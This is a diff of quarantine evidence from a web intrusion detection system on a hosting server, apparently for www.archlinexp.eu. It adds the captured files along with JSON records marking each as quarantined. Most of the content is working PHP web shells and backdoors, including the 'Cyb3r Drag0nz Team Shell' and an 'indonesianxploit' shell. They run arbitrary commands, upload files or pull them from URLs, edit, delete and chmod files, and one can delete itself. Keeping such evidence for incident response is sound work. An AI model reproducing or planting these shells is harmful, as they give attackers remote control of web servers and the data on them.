+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json.evidence.json new file mode 100644 index 0000000..a68a1a5 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4966", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helixultimate/_h3x_672ba9cf.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863638, + "size": 1102, + "uid": 20043 + }, + "rel_path": "templates/shaper_helixultimate/_h3x_672ba9cf.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json.evidence.json new file mode 100644 index 0000000..2ff357a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4964", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helixultimate/_h3x_672ba9cf.phar.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863604, + "size": 1102, + "uid": 20043 + }, + "rel_path": "templates/shaper_helixultimate/_h3x_672ba9cf.phar.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json.evidence.json new file mode 100644 index 0000000..42b48d5 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4965", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helixultimate/_h3x_672ba9cf.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863595, + "size": 1102, + "uid": 20043 + }, + "rel_path": "templates/shaper_helixultimate/_h3x_672ba9cf.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json.evidence.json new file mode 100644 index 0000000..c46b673 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4961", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helixultimate/_h3x_672ba9cf.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863602, + "size": 1102, + "uid": 20043 + }, + "rel_path": "templates/shaper_helixultimate/_h3x_672ba9cf.php5.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json.evidence.json new file mode 100644 index 0000000..aa19768 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4972", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863603, + "size": 1102, + "uid": 20043 + }, + "rel_path": "templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json b/var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json new file mode 100644 index 0000000..711797a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json.evidence.json new file mode 100644 index 0000000..72d2034 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5216", + "log_excerpt": "[quarantine] www.archlinexp.eu:tmp/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json)", + "original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d", + "original_stat": { + "gid": 30037, + "mtime": 1783194681, + "size": 762, + "uid": 20043 + }, + "rel_path": "tmp/c_03e0fd55.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json b/var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json new file mode 100644 index 0000000..3b8ccaa --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json.evidence.json new file mode 100644 index 0000000..3db8b29 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5223", + "log_excerpt": "[quarantine] www.archlinexp.eu:tmp/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json)", + "original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8", + "original_stat": { + "gid": 30037, + "mtime": 1783201889, + "size": 762, + "uid": 20043 + }, + "rel_path": "tmp/c_7f0b46f9.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..cb9b65e --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5224", + "log_excerpt": "[quarantine] www.archlinexp.eu:tmp/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353219, + "size": 10657, + "uid": 20043 + }, + "rel_path": "tmp/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json b/var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json new file mode 100644 index 0000000..199d0d1 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json @@ -0,0 +1 @@ +


'.php_uname()."\n".'
{ Uploader by X-MrG3P5 }

';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Ok Uploaded';}else{echo 'Not uploaded!';}}?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json.evidence.json new file mode 100644 index 0000000..bf44ac5 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5226", + "log_excerpt": "[quarantine] www.archlinexp.eu:tmp/wirrd.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json)", + "original_sha256": "a9422f224ffc70deb475a1ad4d399a4bfcb87a3a7051341bfd9a8326153416cb", + "original_stat": { + "gid": 30037, + "mtime": 1783680060, + "size": 448, + "uid": 20043 + }, + "rel_path": "tmp/wirrd.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json b/var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . "
"); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json.evidence.json new file mode 100644 index 0000000..42b5b35 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5227", + "log_excerpt": "[quarantine] www.archlinexp.eu:tmp/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346948, + "size": 10657, + "uid": 20043 + }, + "rel_path": "tmp/yhajxaav.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/uploader.json b/var/www/hosting/archlinexp.eu/www/uploader.json new file mode 100644 index 0000000..31f5773 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/uploader.json @@ -0,0 +1 @@ +BDKR28
'.php_uname()."\n".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/uploader.json.evidence.json b/var/www/hosting/archlinexp.eu/www/uploader.json.evidence.json new file mode 100644 index 0000000..3aa0c12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/uploader.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4941", + "log_excerpt": "[quarantine] www.archlinexp.eu:uploader.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/uploader.json)", + "original_sha256": "c5010f46b3a71c000b5499d6619b3f42605eeafab2c571a50cf0eef31cb67ff7", + "original_stat": { + "gid": 30037, + "mtime": 1783700804, + "size": 325, + "uid": 20043 + }, + "rel_path": "uploader.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/vile.php.json b/var/www/hosting/archlinexp.eu/www/vile.php.json new file mode 100644 index 0000000..b8cbb94 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/vile.php.json @@ -0,0 +1,40 @@ +' + .''; + } + exit(0); +} +$c=$_GET['c'].' 2>&1'; +$o=''; +if(function_exists('shell_exec')){$o=@shell_exec($c);} +elseif(function_exists('exec')){@exec($c,$a);$o=implode(" +",$a);} +elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} +elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} +elseif(function_exists('popen')){ + $h=@popen($c,'r');$o=''; + while(!feof($h)){$o.=fread($h,4096);} + pclose($h); +}else{$o='BLOCKED';} +@ob_end_clean(); +header('Content-Type: text/plain'); +echo 'RXST:'.base64_encode($o===null?'':$o).':RXEND'; +exit(0); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/vile.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/vile.php.json.evidence.json new file mode 100644 index 0000000..684c825 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/vile.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4937", + "log_excerpt": "[quarantine] www.archlinexp.eu:vile.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/vile.php.json)", + "original_sha256": "3e8674589c9a7ef3023d4ee162625c603a123d1aa79b09dc9f9b3f0a4e9c279e", + "original_stat": { + "gid": 30037, + "mtime": 1783955286, + "size": 1223, + "uid": 20043 + }, + "rel_path": "vile.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/wp-blog.php.json b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json new file mode 100644 index 0000000..f65fd91 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json @@ -0,0 +1,577 @@ + +
+ ___________________________
+< root@indonesianxploit~yourdre4m7 >
+ ---------------------------
+	
'; + exit; +} else { + $_SESSION['logged_in'] = true; +} +// ====================== +// Handle AJAX Terminal Command +if (isset($_POST['ajax_terminal_cmd'])) { + $cmd = $_POST['ajax_terminal_cmd']; + $output = shell_exec($cmd . ' 2>&1'); + echo htmlspecialchars($output); + exit; +} + +// ====================== +// Current directory handling +$dir = isset($_GET['dir']) && is_dir($_GET['dir']) ? $_GET['dir'] : getcwd(); + +// =============== +// Actions: delete, download, rename, chmod, edit file +if (isset($_GET['delete'])) { + $p = $_GET['delete']; + if (is_dir($p)) deleteDirectory($p); + else unlink($p); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +if (isset($_GET['download'])) { + $f = $_GET['download']; + if (is_file($f)) { + header('Content-Type: application/octet-stream'); + header('Content-Disposition: attachment; filename="' . basename($f) . '"'); + header('Content-Length: ' . filesize($f)); + readfile($f); + exit; + } +} + +if (isset($_GET['readfile'])) { + $f = $_GET['readfile']; + if (file_exists($f) && is_file($f)) { + header("Content-Type: text/plain"); + echo file_get_contents($f); + } else { + http_response_code(404); + echo "File not found"; + } + exit; +} + +if (isset($_POST['rename_old'], $_POST['rename_new'])) { + $old = $_POST['rename_old']; + $new = dirname($old) . '/' . basename($_POST['rename_new']); + if (file_exists($old) && !file_exists($new)) rename($old, $new); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +if (isset($_POST['chmod_target'], $_POST['chmod_mode'])) { + $target = $_POST['chmod_target']; + $mode = octdec($_POST['chmod_mode']); + if (file_exists($target)) chmod($target, $mode); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +if (isset($_POST['edit_path'], $_POST['edit_content'])) { + file_put_contents($_POST['edit_path'], $_POST['edit_content']); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +// Upload file handler +if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['fileToUpload'])) { + $uploadDir = $dir . DIRECTORY_SEPARATOR; + $targetFile = $uploadDir . basename($_FILES["fileToUpload"]["name"]); + + if ($_FILES["fileToUpload"]["size"] > 5 * 1024 * 1024) { + $uploadMsg = "

Error: File terlalu besar (max 5MB).

"; + } else { + if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) { + $uploadMsg = "

File " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " berhasil diupload.

"; + } else { + $uploadMsg = "

Error saat mengupload file.

"; + } + } +} + +// Create folder handler +if (isset($_POST['new_folder_name'])) { + $newFolder = $dir . DIRECTORY_SEPARATOR . basename($_POST['new_folder_name']); + if (!file_exists($newFolder)) { + mkdir($newFolder); + header("Location: ?dir=" . urlencode($dir)); + exit; + } else { + $folderMsg = "

Folder sudah ada.

"; + } +} + +// Create file handler +if (isset($_POST['new_file_name'])) { + $newFile = $dir . DIRECTORY_SEPARATOR . basename($_POST['new_file_name']); + if (!file_exists($newFile)) { + file_put_contents($newFile, ""); + header("Location: ?dir=" . urlencode($dir)); + exit; + } else { + $fileMsg = "

File sudah ada.

"; + } +} + +// Delete directory recursive function +function deleteDirectory($dir) { + if (!file_exists($dir)) return; + if (!is_dir($dir)) return unlink($dir); + foreach (scandir($dir) as $item) { + if (in_array($item, ['.', '..'])) continue; + deleteDirectory($dir . '/' . $item); + } + rmdir($dir); +} + +// Format size helper +function formatSize($bytes) { + $sizes = ['B', 'KB', 'MB', 'GB', 'TB']; + $i = 0; + while ($bytes >= 1024 && $i < count($sizes) - 1) { + $bytes /= 1024; + $i++; + } + return round($bytes, 2) . ' ' . $sizes[$i]; +} + +// Render file list table +function renderTable($dir) { + $rows = ''; + foreach (scandir($dir) as $f) { + if (in_array($f, ['.', '..'])) continue; + $p = $dir . '/' . $f; + $isDir = is_dir($p); + $size = $isDir ? '-' : formatSize(filesize($p)); + $mod = date('Y-m-d H:i:s', filemtime($p)); + $perm = substr(sprintf('%o', fileperms($p)), -4); + $rows .= " + + " . htmlspecialchars($f) . " + $size + $mod + $perm + + " . (!$isDir ? "Download | " : "") . " + Delete | + Rename | + Chmod" . + (!$isDir ? " | Edit" : "") . + " + +"; + } + return " + + $rows +
NameSizeModifiedPermAction
